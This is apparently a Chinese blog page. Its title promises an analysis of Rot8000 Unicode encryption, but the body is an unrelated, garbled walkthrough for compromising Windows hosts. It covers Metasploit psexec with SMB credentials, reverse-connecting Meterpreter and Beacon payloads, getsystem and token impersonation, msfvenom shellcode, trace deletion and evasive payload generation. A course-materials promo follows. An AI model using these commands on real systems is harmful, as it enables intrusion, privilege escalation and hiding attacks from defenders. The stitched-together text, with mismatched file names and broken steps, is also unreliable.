深入解析Rot8000:Unicode字符集下的对称加密艺术
2026/4/7 21:34:00
msfconsoleuse exploit/windows/smb/psexecset RHOSTS <目标IP> set SMBUser <用户名> set SMBPass <密码> set PAYLOAD windows/meterpreter/reverse_tcp set LHOST <本地IP> set LPORT 4444exploit成功后会得到一个低权限的 Meterpreter 会话,例如:
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.150:49215)sessions -i 1getsystem[*] Got SYSTEM via technique 1.getuid如果返回:
Server username: NT AUTHORITY\SYSTEM则说明提权成功。
load incognitolist_tokens -u可能看到:
[*] Available tokens: NT AUTHORITY\SYSTEM DOMAIN\Administratorimpersonate_token "NT AUTHORITY\\SYSTEM"getuid应返回 SYSTEM 权限。
在 Cobalt Strike 中生成 Payload(Beacon)。
Cobalt Strike Console-> Cobalt Strike 菜单 -> Attacks -> Packages -> Windows Executable (S)。
windows/beacon_http/reverse_http或其他你配置的类型。upload /home/hao/12.exe C:\\Windows\\Temp\\12.exeexecute -f C:\\Windows\\Temp\\14.exe如果无法直接执行 Beacon Payload,也可以使用msfvenom生成 Shellcode 并在 Cobalt Strike 中监听。步骤如下:
msfvenom -p windows/meterpreter/reverse_http LHOST=<Cobalt Strike 服务器IP> LPORT=80 -f raw > /tmp/cs_shellcode.rawupload /tmp/cs_shellcode.raw C:\\Windows\\Temp\\cs_shellcode.rawexecute -f C:\\Windows\\Temp\\cs_shellcode.rawshell whoami应返回:
NT AUTHORITY\SYSTEM保持会话稳定
清理痕迹
rm C:\\Windows\\Temp\\beacon.exe* 使用 Cobalt Strike 的 **Artifact Kit** 生成更隐蔽的 Payload。getsystem提权,失败则用 incognito 进行令牌冒充。网络安全学习资源分享:
给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。
因篇幅有限,仅展示部分资料,朋友们如果有需要全套《网络安全入门+进阶学习资源包》,请看下方扫描即可前往获取